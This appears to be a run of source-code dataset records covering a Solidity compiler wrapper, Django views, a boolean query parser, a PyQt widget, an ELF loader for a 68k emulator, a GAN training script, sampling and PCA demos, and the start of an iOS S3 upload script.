contracts can be provided (optional)\n allow_paths: Additional paths from where it is allowed to load contracts\n pattern: The pattern to find the solidity files\n optimize: Whether to turn on the solidity optimizer\n optimize_runs: Number of contract runs to optimize for\n only_abi: Whether to only create the abi or not\n evm_version: target evm version to use for generated code\n\n Returns: A dictionary containing the compiled assets of the contracts\n \"\"\"\n\n if file_paths is None:\n file_paths = []\n\n if allow_paths is None:\n allow_paths = []\n\n if contracts_path is None and not file_paths:\n contracts_path = \"contracts\"\n\n if contracts_path is not None:\n file_paths.extend(find_files(contracts_path, pattern=pattern))\n allow_paths.append(contracts_path)\n\n sources = load_sources(file_paths)\n\n if only_abi:\n output_selection = ABI_OUTPUT_SELECTION\n else:\n output_selection = DEFAULT_OUTPUT_SELECTION\n\n std_input = {\n \"language\": \"Solidity\",\n \"sources\": sources,\n \"settings\": {\n \"outputSelection\": {\"*\": {\"*\": output_selection}},\n \"evmVersion\": evm_version,\n },\n }\n\n if optimize:\n std_input[\"settings\"][\"optimizer\"] = {\"enabled\": True, \"runs\": optimize_runs}\n\n compilation_result = compile_standard(\n std_input, allow_paths=\",\".join(os.path.abspath(path) for path in allow_paths)\n )\n\n if \"errors\" in compilation_result:\n log_compilation_errors(compilation_result[\"errors\"])\n\n compiled_contracts = normalize_compiled_contracts(\n compilation_result[\"contracts\"], file_paths\n )\n return compiled_contracts\n\n\ndef compile_contract(\n name: str, *, contracts_path=\"contracts\", file_extension=\".sol\", optimize=True\n):\n filename = name + file_extension\n file_paths = list(find_files(contracts_path, filename))\n\n if len(file_paths) < 1:\n raise ValueError(\"File not found: {}\".format(filename))\n\n if len(file_paths) > 1:\n raise ValueError(\"Multiple files found: {}\".format(file_paths))\n\n compiled_contracts = compile_project(\n file_paths=file_paths, allow_paths=[contracts_path], optimize=optimize\n )\n return compiled_contracts[name]\n\n\ndef build_initcode(*, contract_bytecode, contract_abi=[], constructor_args=[]):\n constructor_abi = get_constructor_abi(contract_abi)\n\n # The initcode is the bytecode with the encoded arguments appended\n if constructor_abi:\n return encode_abi(\n web3=Web3(),\n abi=constructor_abi,\n arguments=constructor_args,\n data=contract_bytecode,\n )\n else:\n return contract_bytecode\n\n\nclass UnknownContractException(Exception):\n pass\n\n\ndef filter_contracts(\n contract_names: List[str], contract_assets_in: Dict[str, Any]\n) -> Dict[str, Any]:\n if contract_names is None:\n return contract_assets_in.copy()\n\n output_dict: Dict[str, Any] = {}\n try:\n for contract_name in contract_names:\n output_dict[contract_name] = contract_assets_in[contract_name]\n except KeyError as e:\n raise UnknownContractException(*e.args) from e\n\n return output_dict\n","sub_path":"src/deploy_tools/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486060411","text":"from django.db.models import ObjectDoesNotExist\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.template import loader\n\nimport arrow\nfrom gestionnaire.forms import RechercheForm, EmpruntForm\nfrom .models import Outil, Emprunt\n\nfrom .forms import *\n\n\n# Create your views here.\n\n\ndef test(request):\n return render(request, 'gestionnaire/test.html')\n\n\ndef index(request):\n template = loader.get_template('gestionnaire/index.html')\n return HttpResponse(template.render({}, request))\n\n\ndef liste_outil(request):\n recherche_text = ''\n recherche_lieu = ''\n if request.method == 'POST':\n formulaire_recherche = RechercheForm(request.POST)\n if formulaire_recherche.is_valid():\n recherche_text = formulaire_recherche.cleaned_data['nom_text']\n recherche_lieu = formulaire_recherche.cleaned_data['lieu']\n if recherche_lieu is None:\n recherche_lieu = ''\n\n formulaire_recherche = RechercheForm()\n outil_list = Outil.objects.order_by('reference_text').filter(nom_text__contains=recherche_text, lieu__nom_text__contains=recherche_lieu)\n outil_list = outil_list.exclude(nom_text='Sarah la plus belle')\n\n template = loader.get_template('gestionnaire/liste_outil.html')\n context = {\n 'outil_list': outil_list,\n 'formulaire_recherche': formulaire_recherche,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef detail_outil(request, outil_id):\n outil = get_object_or_404(Outil, id=outil_id)\n\n template = loader.get_template('gestionnaire/detail_outil.html')\n\n # L'utilisateur arrive sur la page.\n if request.method != 'POST':\n formulaire_emprunt = EmpruntForm()\n\n # L'utilisateur clic sur un bouton.\n else:\n formulaire_emprunt = EmpruntForm(request.POST)\n formulaire_emprunt.outil = outil\n if formulaire_emprunt.is_valid():\n emprunt = formulaire_emprunt.save(commit=False)\n emprunt.outil = outil\n emprunt.save()\n formulaire_emprunt = EmpruntForm()\n\n # Information sur l'outil.\n try:\n emprunts_non_rendu = outil.emprunt_set.filter(rendu_date__isnull=True)\n emprunts_non_rendu = emprunts_non_rendu.order_by('debut_emprunt_date')\n except ObjectDoesNotExist:\n emprunts_non_rendu = \"\"\n\n # Template et variable.\n\n context = {'outil': outil,\n 'emprunts_non_rendu': emprunts_non_rendu,\n 'formulaire_emprunt': formulaire_emprunt,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef confirmation_rendre_outil(request, outil_id, emprunt_id):\n outil = get_object_or_404(Outil, id=outil_id)\n emprunt = get_object_or_404(Emprunt, id=emprunt_id)\n template = loader.get_template('gestionnaire/confirmation_rendre_outil.html')\n context = {'outil': outil,\n 'emprunt': emprunt,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef rendre_outil(request, outil_id, emprunt_id):\n emprunt = get_object_or_404(Emprunt, id=emprunt_id)\n emprunt.rendu_date = arrow.utcnow().datetime\n emprunt.save()\n\n return HttpResponseRedirect('/gestionnaire/liste_outil/{0}'.format(outil_id))\n","sub_path":"gestionnaire/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"107986181","text":"from nltk.stem.porter import *\nimport math\n\ndef tokenize(word):\n '''\n Tokenises a given word with Porter Stemmer and case folding\n '''\n word = word.lower()\n word = PorterStemmer().stem(word)\n return word\n\ndef add_skip_ptr(posting_list):\n '''\n Returns a string form of posting list with skip pointers, indicated by carat\n '''\n l = len(posting_list)\n result = ''\n if l > 2:\n num_ptr = math.floor(math.sqrt(l))\n ptr_gap = math.floor(l / num_ptr)\n for i in range(l):\n if i % ptr_gap == 0 and i < l - 2:\n if i + ptr_gap >= l:\n result += str(posting_list[i]) + \\\n ' ^' + str(l - i - 1) + ' '\n else:\n result += str(posting_list[i]) + ' ^' + str(ptr_gap) + ' '\n else:\n result += str(posting_list[i]) + ' '\n else:\n for i in range(l):\n result += str(posting_list[i]) + ' '\n return result\n\ndef list_to_string(my_list):\n '''\n Stringifies and concatenates (with a space between) the elements of the given list\n '''\n res = ''\n for l in my_list:\n res += str(l) + ' '\n return res\n\ndef split_bool_expr(expression):\n '''\n Splits given boolean string expression into string list of operators and operands\n\n Operators handled: AND, OR, NOT, ()\n\n Assumptions: no nested (); expression is valid\n '''\n initial_split = expression.split()\n final_split = []\n for item in initial_split:\n if item[0] == \"(\" and item[-1] == \")\":\n final_split.extend([\"(\", item[1:-1], \")\"])\n elif item[0] == \"(\":\n final_split.extend([\"(\", item[1:]])\n elif item[len(item) - 1] == \")\":\n final_split.extend([item[:-1], \")\"])\n else:\n final_split.append(item)\n\n return final_split\n\ndef has_greater_or_equal_precedence(op1, op2):\n '''\n Returns true if `op1` has greater than or equal precedence to `op2`. False otherwise.\n\n Operators handled (decreasing precedence): AND, OR\n '''\n return (op1 == \"AND\" and op2 == \"OR\") or op1 == op2\n\ndef infix_to_postfix(expression):\n '''\n Translates string infix boolean expression to string list postfix boolean expression\n\n Operators handled: AND, OR, NOT, ()\n\n Assumptions: no nested (); expression is valid\n '''\n split_expr = split_bool_expr(expression)\n output_queue = [] # first in, first out\n operator_stack = [] # last in, first out\n unary_list = []\n\n # use Shunting-Yard algorithm, with modifications to handle NOT unary operator\n for item in split_expr:\n if item == \"NOT\":\n unary_list.append(item)\n elif item == \"AND\" or item == \"OR\":\n while len(operator_stack) > 0 and has_greater_or_equal_precedence(operator_stack[-1], item) and operator_stack[-1] != \"(\":\n output_queue.append(operator_stack.pop())\n operator_stack.append(item)\n elif item == \"(\":\n operator_stack.append(item)\n if len(unary_list) > 0:\n unary_list.append(item)\n elif item == \")\":\n while operator_stack[-1] != \"(\":\n output_queue.append(operator_stack.pop())\n if operator_stack[-1] == \"(\":\n operator_stack.pop()\n if len(unary_list) > 0 and unary_list[-1] == \"(\":\n unary_list.pop()\n while len(unary_list) > 0 and unary_list[-1] != \"(\":\n output_queue.append(unary_list.pop())\n else:\n # item is an operand\n output_queue.append(item)\n if len(unary_list) > 0:\n while len(unary_list) > 0 and unary_list[-1] != \"(\":\n output_queue.append(unary_list.pop())\n \n for operator in reversed(operator_stack):\n output_queue.append(operator)\n \n return output_queue\n","sub_path":"HW2/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562514439","text":"\"\"\"\n Filter List Widget with add remove buttons\n\"\"\"\nimport sys\nfrom typing import Union\nfrom PyQt5.QtCore import pyqtSlot, pyqtSignal\nfrom PyQt5.QtWidgets import (\n QApplication, QWidget, QVBoxLayout, QHBoxLayout, QListView, QLineEdit,\n QSizePolicy, QListWidgetItem, QFrame, QLabel\n)\nfrom PyQt5.QtGui import QStandardItemModel, QStandardItem\nfrom CustomWidgets.add_remove_buttons import EDAddRemoveButtons\n\n\nclass EDFilterListWidget(QWidget):\n \"\"\"FilterListWidget Combines a QLineEdit and a QListView\"\"\"\n add = pyqtSignal()\n remove = pyqtSignal()\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n\n v_layout = QVBoxLayout(self)\n h_layout = QHBoxLayout()\n\n filter_frame = QFrame(self)\n filter_h_layout = QHBoxLayout(filter_frame)\n filter_h_layout.setContentsMargins(0, 0, 0, 0)\n size_policy = QSizePolicy(QSizePolicy.MinimumExpanding, QSizePolicy.Fixed)\n filter_frame.setSizePolicy(size_policy)\n\n filter_lbl = QLabel(\"Filter\")\n self.line_edit = QLineEdit(self)\n\n filter_h_layout.addWidget(filter_lbl)\n filter_h_layout.addWidget(self.line_edit)\n\n h_layout.addWidget(filter_frame)\n self.line_edit.textEdited.connect(self.filter)\n\n self.list = QListView(self)\n self.model = QStandardItemModel(self.list)\n self.list.setModel(self.model)\n size_policy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self.list.setSizePolicy(size_policy)\n\n v_layout.addLayout(h_layout)\n v_layout.addWidget(self.list)\n\n self.controls = EDAddRemoveButtons(parent=self)\n self.controls.add_btn.clicked.connect(self.add_item)\n self.controls.rm_btn.clicked.connect(self.remove_item)\n v_layout.addWidget(self.controls)\n\n def filter(self, filter_text):\n \"\"\"Hides rows that do not have the pattern\"\"\"\n for row in range(self.model.rowCount()):\n if filter_text in str(self.model.item(row).text()).lower():\n self.list.setRowHidden(row, False)\n else:\n self.list.setRowHidden(row, True)\n\n @pyqtSlot()\n def add_item(self):\n \"\"\"Add item\"\"\"\n self.add.emit()\n\n @pyqtSlot()\n def remove_item(self):\n \"\"\"Remove Item\"\"\"\n self.remove.emit()\n\n def clear(self):\n \"\"\"Clear the model\"\"\"\n self.model.clear()\n\n # pylint: disable=invalid-name\n def takeItem(self, row: int):\n \"\"\"Take Item from the list\"\"\"\n item = self.model.takeItem(row)\n self.model.takeRow(row)\n return item\n\n # pylint: disable=invalid-name\n def addItem(self, item: Union[QListWidgetItem, QStandardItem, str]):\n \"\"\"Add Item to the list\"\"\"\n if isinstance(item, str):\n item = QStandardItem(item)\n self.model.appendRow(item)\n\n def count(self):\n \"\"\"Convenience method\"\"\"\n return self.model.rowCount()\n\n def item(self, row):\n \"\"\"Convenience method to reveal model method\"\"\"\n return self.model.item(row)\n\n # pylint: disable=invalid-name\n def selectedIndexes(self):\n \"\"\"Convenience Function to revel selectionModel option\"\"\"\n return self.list.selectionModel().selectedIndexes()\n\n # pylint: disable=invalid-name\n def selectedItems(self):\n \"\"\"Convenience to replicate functionality in QListWidget\"\"\"\n inds = self.selectedIndexes()\n items = [self.item(i.row()) for i in inds]\n return items\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n codes = [\n 'LOAA-05379',\n 'LOAA-04468',\n 'LOAA-03553',\n 'LOAA-02642',\n 'LOAA-05731'\n ]\n\n ex = EDFilterListWidget()\n\n for code in codes:\n an_item = QStandardItem(code)\n an_item.setCheckable(True)\n ex.model.appendRow(an_item)\n\n ex.show()\n sys.exit(app.exec_())\n","sub_path":"build/lib/CustomWidgets/filter_list_widget.py","file_name":"filter_list_widget.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3776344","text":"import csv\nwith open('iowa_gop_results.csv') as csvfile:\n # instantiate csv reader to read results file\n resultsreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n # initialize variables\n county = ''\n rowlist = []\n resultsdict = {}\n # skip first line of csv file\n next(resultsreader)\n for row in resultsreader:\n # store old county data in separate variable\n oldcounty = county\n county = row[0]\n # for each new county cluster, add county (key) & rowlist (val) to resultsdict and reset\n if oldcounty != county and oldcounty != '':\n resultsdict[oldcounty] = rowlist\n rowlist = []\n oldcounty = county\n # add candidate voting results to rowlist\n rowlist.append({\n 'votes':int(row[1]),\n 'percentage':float(row[2]) * 100,\n 'candidate':row[3] })\n # add last rowlist to resultsdict\n resultsdict[oldcounty] = rowlist\n","sub_path":"iowa_results.py","file_name":"iowa_results.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635855929","text":"#\n# ELF image loader\n#\nimport os\nfrom bisect import bisect\n\nfrom musashi.m68k import (\n mem_ram_write_block\n)\n\nfrom elftools.elf.elffile import ELFFile\nfrom elftools.elf.sections import SymbolTableSection\nfrom elftools.elf.constants import SH_FLAGS\nfrom elftools.elf.descriptions import (\n describe_e_machine,\n describe_e_type\n)\n\n\nclass image(object):\n \"\"\"\n Program image in the emulator\n \"\"\"\n\n def __init__(self, emu, image_filename):\n \"\"\"\n Read the ELF headers and prepare to load the executable\n \"\"\"\n\n self._emu = emu\n self._lineinfo_cache = dict()\n self._symbol_cache = dict()\n self._address_cache = dict()\n self._addr2line = self._findtool('m68k-elf-addr2line')\n self._text_base = 0\n self._text_end = 0\n self._low_sym = 0xffffffff\n self._high_sym = 0\n\n if self._addr2line is None:\n raise RuntimeError(\n \"unable to find m68k-elf-addr2line and/or m68k-elf-readelf, check your PATH\")\n\n elf_fd = open(image_filename, \"rb\")\n self._elf = ELFFile(elf_fd)\n\n if self._elf.header['e_type'] != 'ET_EXEC':\n raise RuntimeError('not an ELF executable file')\n if self._elf.header['e_machine'] != 'EM_68K':\n raise RuntimeError('not an M68K ELF file')\n if self._elf.num_segments() == 0:\n raise RuntimeError('no segments in ELF file')\n\n # iterate sections\n for section in self._elf.iter_sections():\n\n # does this section need to be loaded?\n if section['sh_flags'] & SH_FLAGS.SHF_ALLOC:\n p_addr = section['sh_addr']\n p_size = section['sh_size']\n self._emu.log(\n '{} {:#x}/{:#x} '.format(section.name, p_addr, p_size))\n\n # XXX should really be a call on the emulator\n mem_ram_write_block(p_addr, p_size, section.data())\n\n if section.name == '.text':\n self._text_base = p_addr\n self._text_end = p_addr + p_size\n\n # does it contain symbols?\n if isinstance(section, SymbolTableSection):\n self._cache_symbols(section)\n\n self._symbol_index = sorted(self._symbol_cache.keys())\n\n def _cache_symbols(self, section):\n\n for nsym, symbol in enumerate(section.iter_symbols()):\n\n # only interested in data and function symbols\n s_type = symbol['st_info']['type']\n if s_type != 'STT_OBJECT' and s_type != 'STT_FUNC':\n continue\n\n s_addr = symbol['st_value']\n s_size = symbol['st_size']\n s_name = str(symbol.name)\n\n self._low_sym = min(s_addr, self._low_sym)\n self._high_sym = max(s_addr + s_size, self._high_sym)\n\n self._symbol_cache[s_addr] = {'name': s_name, 'size': s_size}\n self._address_cache[s_name] = s_addr\n\n def _findtool(self, tool):\n for path in os.environ['PATH'].split(os.pathsep):\n path = path.strip('\"')\n candidate = os.path.join(path, tool)\n if os.path.isfile(candidate) and os.access(candidate, os.X_OK):\n return candidate\n return None\n\n def lineinfo(self, addr):\n try:\n return self._lineinfo_cache[addr]\n\n except KeyError:\n\n # -i gives extra information about inlined functions, but it puts\n # newlines in the result that mess up the log...\n\n symb = subprocess.Popen([self._addr2line,\n '-pfC',\n '-e',\n args.image,\n '{:#x}'.format(addr)],\n stdout=subprocess.PIPE)\n output, err = symb.communicate()\n\n self._lineinfo_cache[addr] = output\n return output\n\n def symname(self, addr):\n if addr < self._low_sym or addr >= self._high_sym:\n return ''\n\n try:\n return self._symbol_cache[addr]['name']\n\n except KeyError:\n # look for the next highest symbol address\n pos = bisect(self._symbol_index, addr)\n if pos == 0:\n # address lower than anything we know\n return ''\n insym = self._symbol_index[pos - 1]\n\n # check that the value is within the symbol\n delta = addr - insym\n if self._symbol_cache[insym]['size'] <= delta:\n return ''\n\n # it is, construct a name + offset string\n name = '{}+{:#x}'.format(self._symbol_cache[insym]['name'], delta)\n\n # add it to the symbol cache\n self._symbol_cache[addr] = {'name': name, 'size': 1}\n\n return name\n\n def symrange(self, name):\n try:\n addr = self._address_cache[name]\n size = self._symbol_cache[addr]['size']\n except KeyError:\n try:\n addr = int(name)\n size = 1\n except:\n raise RuntimeError(\n 'can\\'t find a symbol called {} and can\\'t convert it to an address'.format(name))\n\n return range(addr, addr + size)\n\n def check_text(self, addr):\n if addr < self._text_base or addr >= self._text_end:\n return False\n return True\n","sub_path":"imageELF.py","file_name":"imageELF.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209473483","text":"import csv\nimport logging\nfrom location.location import Location\n\n\nclass Component(object):\n csv_file = \"\"\n csv_reader = \"\"\n\n def __init__(self, company_name):\n file_name = Location(__file__, company_name.lower() + \"_components.csv\")\n try:\n self.csv_file = open(file_name, \"rt\", encoding=\"utf8\")\n self.csv_reader = csv.reader(self.csv_file, delimiter=';')\n except Exception as error:\n logging.warning(\"class Fetch_Component: Opening CSV file failed. Error: {0}\".format(error))\n\n def reset_reader(self):\n self.csv_file.seek(0)\n\n def get_id(self, component_url):\n \"\"\"\n Fetch id from the component url.\n row[0] contains the id\n row[1] contains the component\n :param component_url: string\n :return: integer\n \"\"\"\n result = False\n for row in self.csv_reader:\n if component_url.lower().find(row[1]) > 0:\n result = int(row[0])\n self.reset_reader()\n break\n\n return result\n","sub_path":"crawler/component/fetch_component.py","file_name":"fetch_component.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"186207840","text":"import argparse\nimport os\nimport sys\n\nimport numpy as np\nimport chainer\nfrom chainer import training\nfrom chainer.training import extension\nfrom chainer.training import extensions\nfrom chainer.datasets import TransformDataset\nfrom chainercv.transforms import random_rotate\nfrom chainercv.transforms.image.resize import resize\n\nsys.path.append(os.path.dirname(__file__))\n\nfrom common.dataset import Cifar10Dataset\nfrom common.dataset import ImagenetDataset\nfrom common.dataset import CelebA\nfrom common.evaluation import sample_generate, sample_generate_light, calc_inception, calc_FID\nfrom common.record import record_setting\nimport common.net\n\ndef make_optimizer(model, alpha, beta1, beta2):\n optimizer = chainer.optimizers.Adam(alpha=alpha, beta1=beta1, beta2=beta2)\n optimizer.setup(model)\n return optimizer\n\nparser = argparse.ArgumentParser(description='Train script')\nparser.add_argument('--algorithm', '-a', type=str, default=\"dcgan\", help='GAN algorithm')\nparser.add_argument('--architecture', type=str, default=\"dcgan\", help='Network architecture')\nparser.add_argument('--batchsize', type=int, default=64)\nparser.add_argument('--max_iter', type=int, default=100000)\nparser.add_argument('--gpu', '-g', type=int, default=0, help='GPU ID (negative value indicates CPU)')\nparser.add_argument('--out', '-o', default='result', help='Directory to output the result')\nparser.add_argument('--snapshot_interval', type=int, default=10000, help='Interval of snapshot')\nparser.add_argument('--evaluation_interval', type=int, default=10000, help='Interval of evaluation')\nparser.add_argument('--display_interval', type=int, default=100, help='Interval of displaying log to console')\nparser.add_argument('--n_dis', type=int, default=5, help='number of discriminator update per generator update')\nparser.add_argument('--gamma', type=float, default=0.5, help='hyperparameter gamma')\nparser.add_argument('--lam', type=float, default=10, help='gradient penalty')\nparser.add_argument('--adam_alpha', type=float, default=0.0001, help='alpha in Adam optimizer')\nparser.add_argument('--adam_beta1', type=float, default=0.5, help='beta1 in Adam optimizer')\nparser.add_argument('--adam_beta2', type=float, default=0.9, help='beta2 in Adam optimizer')\nparser.add_argument('--output_dim', type=int, default=256, help='output dimension of the discriminator (for cramer GAN)')\n\nargs = parser.parse_args()\nrecord_setting(args.out)\nreport_keys = [\"loss_enc\", \"loss_dis\", \"loss_gen\", \"inception_mean\", \"inception_std\", \"FID\"]\n\n# Set up dataset\n# train_dataset = Cifar10Dataset()\n# train_dataset = CelebA()\ndataset = np.load('./hrp2.npz')['arr_0']\n\n\ndef transform(in_data):\n img = in_data\n img = img.astype(np.float32).transpose((2, 0, 1))\n img /= 255.0\n img = resize(img, (128, 128))\n return img\n\n\ntrain_dataset = TransformDataset(dataset, transform)\ntrain_iter = chainer.iterators.SerialIterator(train_dataset, args.batchsize)\n\n# Setup algorithm specific networks and updaters\nmodels = []\nopts = {}\nupdater_args = {\n \"iterator\": {'main': train_iter},\n \"device\": args.gpu\n}\n\n\nfrom vaegan.updater import Updater\nsize = 128\nbottom_width = (size // 8)\nencoder = common.net.VAEEncoder(size=size)\ngenerator = common.net.DCGANGenerator(n_hidden=100, bottom_width=bottom_width,\n ch=256, z_distribution=\"normal\")\ndiscriminator = common.net.DCGANDiscriminator(ch=256, bottom_width=bottom_width,\n output_dim=2)\nmodels = [encoder, generator, discriminator]\n\n\nif args.gpu >= 0:\n chainer.cuda.get_device_from_id(args.gpu).use()\n print(\"use gpu {}\".format(args.gpu))\n for m in models:\n m.to_gpu()\n\n# Set up optimizers\nopts[\"opt_enc\"] = make_optimizer(encoder, args.adam_alpha, args.adam_beta1, args.adam_beta2)\nopts[\"opt_enc\"].add_hook(chainer.optimizer.WeightDecay(0.00001))\nopts[\"opt_gen\"] = make_optimizer(generator, args.adam_alpha, args.adam_beta1, args.adam_beta2)\nopts[\"opt_gen\"].add_hook(chainer.optimizer.WeightDecay(0.00001))\nopts[\"opt_dis\"] = make_optimizer(discriminator, args.adam_alpha, args.adam_beta1, args.adam_beta2)\nopts[\"opt_dis\"].add_hook(chainer.optimizer.WeightDecay(0.00001))\n\nupdater_args[\"optimizer\"] = opts\nupdater_args[\"models\"] = models\n\n# Set up updater and trainer\nupdater = Updater(**updater_args)\ntrainer = training.Trainer(updater, (args.max_iter, 'iteration'), out=args.out)\n\n# Set up logging\nfor m in models:\n trainer.extend(extensions.snapshot_object(\n m, m.__class__.__name__ + '_{.updater.iteration}.npz'), trigger=(args.snapshot_interval, 'iteration'))\ntrainer.extend(extensions.LogReport(keys=report_keys,\n trigger=(args.display_interval, 'iteration')))\ntrainer.extend(extensions.PrintReport(report_keys), trigger=(args.display_interval, 'iteration'))\ntrainer.extend(sample_generate(generator, args.out), trigger=(args.evaluation_interval, 'iteration'),\n priority=extension.PRIORITY_WRITER)\ntrainer.extend(sample_generate_light(generator, args.out), trigger=(args.evaluation_interval // 10, 'iteration'),\n priority=extension.PRIORITY_WRITER)\ntrainer.extend(calc_inception(generator), trigger=(args.evaluation_interval, 'iteration'),\n priority=extension.PRIORITY_WRITER)\ntrainer.extend(calc_FID(generator), trigger=(args.evaluation_interval, 'iteration'),\n priority=extension.PRIORITY_WRITER)\ntrainer.extend(extensions.ProgressBar(update_interval=10))\n\n# Run the training\ntrainer.run()\n","sub_path":"train_vae.py","file_name":"train_vae.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"181211492","text":"# coding: UTF-8\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\n\n## 2dimention normal distribution\nnu = np.ones((2))\ncovariance = np.array([[0.5,0.5],[0.5,3]])\n# la: 固有値array\n# v: 固有ベクトル array\nla,v = np.linalg.eig(covariance)\navr_sigma = np.average(la) #あとでプロット範囲を決めるときの指標に\n\ndef gibssampling(nu,cov,sample_size):\n \"\"\"\n Gibbs sampling !\n @nu :average vector\n @cov :covariance matrix\n @sample_size :size of sample\n return type :numpy.array\n length :sample_size\n \"\"\"\n samples = []\n dim = len(nu)\n # start point of sampling\n start = [0,0]\n samples.append(start)\n search_dim = 0\n for i in range(sample_size):\n if search_dim == dim-1:\n \"\"\"\n search dimension select is cyclic\n it can replace randomly\n \"\"\"\n search_dim = 0\n else:\n search_dim = search_dim +1\n #new-sampling\n\n prev_sample = samples[-1][:] # previous sample\n A = cov[search_dim][search_dim-1] / float(cov[search_dim-1][search_dim-1]) # A*Σ_yy = Σ_xy\n _y = prev_sample[search_dim-1] # other dimention's previous values\n\n # p(x|y) ~ N(x|nu[x]+A(_y-nu[y]),Σ_zz)\n # Σ_zz = Σ_xx - A0*Σ_yx\n\n mean = nu[search_dim] + A*(_y-nu[search_dim-1])\n sigma_zz = cov[search_dim][search_dim] -A*cov[search_dim-1][search_dim]\n\n sample_x = np.random.normal(loc=mean,scale=np.power(sigma_zz,.5),size=1)\n prev_sample[search_dim] = sample_x[0]\n samples.append(prev_sample)\n return np.array(samples)\n\nsample = gibssampling(nu,covariance,1000)\nplt.plot(sample[:,0],sample[:,1],\"o\",alpha=.1)\n\n#答え合わせ\nmalti_normal = stats.multivariate_normal(mean=nu,cov=covariance)\nX,Y = np.meshgrid(np.linspace(nu[0]-avr_sigma*2,nu[0]+avr_sigma*2,100),\n np.linspace(nu[1]-avr_sigma*2,nu[1]+avr_sigma*2,100))\nPos = np.empty(X.shape + (2,))\nPos[:,:,0]=X\nPos[:,:,1]=Y\nZ=malti_normal.pdf(Pos)\nplt.contour(X,Y,Z,colors=\"k\")\nplt.show()\n","sub_path":"python_study/gibs_sampling.py","file_name":"gibs_sampling.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"537337322","text":"import numpy as np\n\nx = np.array([2.5,0.5,2.2,1.9,3.1,2.3,2,1,1.5,1.1])\ny = np.array([2.4,0.7,2.9,2.2,3,2.7,1.6,1.1,1.6,0.9])\n\n# Step 1: 求平均值以及做normalization\nmean_x = np.mean(x)\nmean_y = np.mean(y)\nscaled_x = x - mean_x\nscaled_y = y - mean_y\ndata = np.matrix([[scaled_x[i],scaled_y[i]] for i in range(len(scaled_x))])\nprint (\"scaled_x:\\n\",scaled_x)\nprint (\"scaled_y:\\n\",scaled_y)\nprint (\"data:\\n\",data)\n\n# Step 2: 求协方差矩阵(Covariance Matrix)\ncov=np.cov(scaled_x,scaled_y)\nprint (\"求协方差矩阵:\\n\",cov)\n\n# 或者散度矩阵\n# np.dot(np.transpose(data),data)\n\n# Step 3: 求协方差矩阵的特征值和特征向量\neig_val, eig_vec = np.linalg.eig(cov)\nprint (\"特征根:\\n\",eig_val)\nprint (\"特征向量:\\n\",eig_vec)\n\n# Step 4: 选择主要成分\n# 得到特征值和特征向量之后,我们可以根据特征值的大小,从大到小的选择K个特征值对应的特征向量\neig_pairs = [(np.abs(eig_val[i]), eig_vec[:,i]) for i in range(len(eig_val))]\neig_pairs.sort(reverse=True)\nprint (\"选择主要成分:\\n\",eig_pairs)\n\n# 从eig_pairs选取前k个特征向量就行。这里,我们只有两个特征向量,选一个最大的\nfeature=eig_pairs[0][1]\nprint (\"最大的:\\n\",feature)\n\n# Step 5: 转化得到降维的数据\n# 主要将原来的���据乘以经过筛选的特征向量组成的特征矩阵之后,就可以得到新的数据了\nnew_data_reduced=np.transpose(np.dot(feature,np.transpose(data)))\nprint (\"转化得到降维的数据:\\n\",new_data_reduced)\n\n\n\n","sub_path":"tensorflow/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"328227803","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n\ndef createList(values):\n head = Node(values[0])\n current = head\n for i in range(1, len(values)):\n current.next = Node(values[i])\n current = current.next\n\n return head\n\ndef reverseLinkedList(seq):\n if seq is None or seq.next is None:\n return seq\n\n new_head = reverseLinkedList(seq.next)\n seq.next.next = seq\n seq.next = None\n\n return new_head\n\ndef printList(seq):\n if seq is None:\n print('Empty Linked List.\\n')\n\n while seq:\n print(seq.val, end=' ')\n seq = seq.next\n print('\\n')\n\n\n\na = [1, 2, 3, 4]\nlinkedlist = createList(a)\nprintList(linkedlist)\nprintList(reverseLinkedList(linkedlist))\n","sub_path":"CrackCodeInterview/recursion_DP/reverseLinkedList.py","file_name":"reverseLinkedList.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"117984515","text":"'''\n ios-s3-dist.py\n\n Python 3 Script to assist in distributing ad-hoc and enterprise iOS builds.\n Uploads build to S3 and creates a manifest.plist file to install it with.\n\n Required information should be profiled in a 'config.json' file.\n\n Usage:\n\n ios-dist.py {filename or path to build}\n\n'''\n\n\ndef main(build_filename):\n\n import tinys3, json, os, plistlib, shutil, zipfile\n\n cnfg = json.load( open('config.json') )\n\n # ---- Get information from build's Info.plist\n\n zfile = 